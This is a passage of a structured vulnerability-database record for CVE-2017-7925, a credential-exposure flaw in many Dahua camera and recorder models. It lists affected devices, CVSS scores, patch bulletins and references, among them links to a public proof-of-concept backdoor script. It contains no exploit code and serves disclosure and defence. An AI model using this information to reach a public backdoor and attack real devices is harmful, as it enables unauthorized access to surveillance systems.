"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-ipc-hdw1xxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-ipc-hdw4xxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-ipc-hdw2xxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-ipc-hfw1xxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dhi-hcvr58a32s-s2",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dhi-hcvr51a08he-s3",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dhi-hcvr51a04he-s3",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-sd6cxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-nvr1xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-ipc-hfw4xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-ipc-hfw2xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-ipc-hfw1xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-ipc-hdw4xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-ipc-hdw2xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-ipc-hdw1xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-ipc-hdbw23a0rn-zs",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-ipc-hdbw13a0sn",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-hcvr5xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-hcvr4xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh ipc hdbw23a0rn zs",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh nvr1xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh hcvr4xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh hcvr5xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dhi hcvr51a04he s3",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dhi hcvr51a08he s3",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dhi hcvr58a32s s2",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh ipc hdbw13a0sn",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh ipc hdw1xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh ipc hdw2xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh ipc hdw4xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh ipc hfw1xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh ipc hfw2xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh ipc hfw4xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh sd6cxx",
"version": null
}
],
"sources": [
{
"db": "IVD",
"id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b"
},
{
"db": "CNVD",
"id": "CNVD-2017-08192"
},
{
"db": "BID",
"id": "98312"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003971"
},
{
"db": "NVD",
"id": "CVE-2017-7925"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1045"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdbw23a0rn-zs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdbw13a0sn_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdbw13a0sn:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdw1xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdw1xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdw2xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdw2xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdw4xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdw4xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hfw1xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hfw1xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hfw2xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hfw2xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hfw4xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hfw4xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-sd6cxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-sd6cxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-nvr1xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-nvr1xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-hcvr4xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ddh-hcvr4xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-hcvr5xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-hcvr5xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dhi-hcvr51a04he-s3_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr51a04he-s3:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dhi-hcvr51a08he-s3_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr51a08he-s3:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dhi-hcvr58a32s-s2_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr58a32s-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-7925"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Bashis",
"sources": [
{
"db": "BID",
"id": "98312"
}
],
"trust": 0.3
},
"cve": "CVE-2017-7925",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-7925",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-08192",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-116128",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-7925",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-7925",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2017-08192",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201704-1045",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "IVD",
"id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b",
"trust": 0.2,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-116128",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b"
},
{
"db": "CNVD",
"id": "CNVD-2017-08192"
},
{
"db": "VULHUB",
"id": "VHN-116128"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003971"
},
{
"db": "NVD",
"id": "CVE-2017-7925"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1045"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information. plural Dahua The product contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Dahua DH-IPC-HDBW23A0RN-ZS is a camera product of Dahua Company of China. Dahua Technology is prone to an authentication-bypass vulnerability and an information-disclosure vulnerability. \nAttackers may exploit these issues to gain unauthorized access to restricted content by bypassing intended security restrictions or to obtain sensitive information that may aid in launching further attacks. Dahua DH-IPC-HDBW23A0RN-ZS, etc. There are security vulnerabilities in many Dahua products. The following products are affected: Dahua DH-IPC-HDBW23A0RN-ZS; DH-IPC-HDBW13A0SN; DH-IPC-HDW1XXX; DH-IPC-HDW2XXX; DH-IPC-HDW4XXX; DH-IPC-HFW4XXX; DH-SD6CXX; DH-NVR1XXX; DH-HCVR4XXX; DH-HCVR5XXX; DHI-HCVR51A04HE-S3; DHI-HCVR51A08HE-S3;",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-7925"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003971"
},
{
"db": "CNVD",
"id": "CNVD-2017-08192"
},
{
"db": "BID",
"id": "98312"
},
{
"db": "IVD",
"id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b"
},
{
"db": "VULHUB",
"id": "VHN-116128"
}
],
"trust": 2.7
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-7925",
"trust": 3.6
},
{
"db": "ICS CERT",
"id": "ICSA-17-124-02",
"trust": 2.8
},
{
"db": "BID",
"id": "98312",
"trust": 2.6
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1045",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2017-08192",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU98841854",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003971",
"trust": 0.8
},
{
"db": "IVD",
"id": "B9A8CA3D-8AC9-429C-880C-4CC25C09C01B",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-116128",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b"
},
{
"db": "CNVD",
"id": "CNVD-2017-08192"
},
{
"db": "VULHUB",
"id": "VHN-116128"
},
{
"db": "BID",
"id": "98312"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003971"
},
{
"db": "NVD",
"id": "CVE-2017-7925"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1045"
}
]
},
"id": "VAR-201705-3743",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b"
},
{
"db": "CNVD",
"id": "CNVD-2017-08192"
},
{
"db": "VULHUB",
"id": "VHN-116128"
}
],
"trust": 1.5166666600000003
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b"
},
{
"db": "CNVD",
"id": "CNVD-2017-08192"
}
]
},
"last_update_date": "2023-12-18T12:29:39.687000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Cybersecurity Vulnerability Update - March 8 2017",
"trust": 0.8,
"url": "http://www.dahuasecurity.com/en/us/single.php?nid=364"
},
{
"title": "Security Notification DHCC-201703-01",
"trust": 0.8,
"url": "http://www1.dahuasecurity.com/annoucementsingle/security-notification-dhcc-201703-01-112.html"
},
{
"title": "Cyber Vulnerability Affecting Certain Dahua IP Cameras and Recorders (030617)",
"trust": 0.8,
"url": "http://us.dahuasecurity.com/en/us/security-bulletin_030617.php"
},
{
"title": "Cyber Vulnerability Affecting Certain Dahua IP Cameras and Recorders (04032017)",
"trust": 0.8,
"url": "http://us.dahuasecurity.com/en/us/security-bulletin_04032017.php"
},
{
"title": "Cybersecurity Statement - March 6th 2017",
"trust": 0.8,
"url": "http://www.dahuasecurity.com/en/us/single.php?nid=354"
},
{
"title": "Patches for Dahua\u0027s multiple digital video recorders and IP camera profile password vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/94425"
},
{
"title": "Repair measures for various UOB product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=99754"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-08192"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003971"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1045"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-522",
"trust": 1.1
},
{
"problemtype": "CWE-264",
"trust": 0.9
},
{
"problemtype": "CWE-260",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-116128"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003971"
},
{
"db": "NVD",
"id": "CVE-2017-7925"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-17-124-02"
},
{
"trust": 2.3,
"url": "http://us.dahuasecurity.com/en/us/security-bulletin_030617.php"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/98312"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-7925"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-7925"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu98841854/index.html"
},
{
"trust": 0.8,
"url": "https://github.com/mcw0/poc/blob/master/dahua-backdoor-poc.py"
},
{
"trust": 0.8,
"url": "https://github.com/mcw0/poc/blob/master/dahua-backdoor.txt"
},
{
"trust": 0.3,
"url": "www.dahuasecurity.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-08192"
},
{
"db": "VULHUB",
"id": "VHN-116128"
},
{
"db": "BID",
"id": "98312"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003971"
},
{
"db": "NVD",
"id": "CVE-2017-7925"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1045"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b"
},
{
"db": "CNVD",
"id": "CNVD-2017-08192"
},
{
"db": "VULHUB",
"id": "VHN-116128"
},
{
"db": "BID",
"id": "98312"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003971"
},
{
"db": "NVD",
"id": "CVE-2017-7925"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1045"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-05T00:00:00",
"db": "IVD",
"id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b"
},
{
"date": "2017-06-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-08192"
},
{
"date": "2017-05-06T00:00:00",
"db": "VULHUB",
"id": "VHN-116128"
},
{
"date": "2017-05-04T00:00:00",
"db": "BID",
"id": "98312"
},
{
"date": "2017-06-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003971"
},
{
"date": "2017-05-06T00:29:00.427000",
"db": "NVD",
"id": "CVE-2017-7925"
},
{
"date": "2017-04-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-1045"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-08192"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-116128"
},
{
"date": "2017-05-23T16:23:00",
"db": "BID",
"id": "98312"
},
{
"date": "2017-07-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003971"
},
{
"date": "2019-10-09T23:29:58.860000",
"db": "NVD",
"id": "CVE-2017-7925"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-1045"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201704-1045"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Dahua Vulnerabilities related to authorization, authority, and access control in products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003971"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201704-1045"
}
],
"trust": 0.6
}
}
VAR-201407-0012
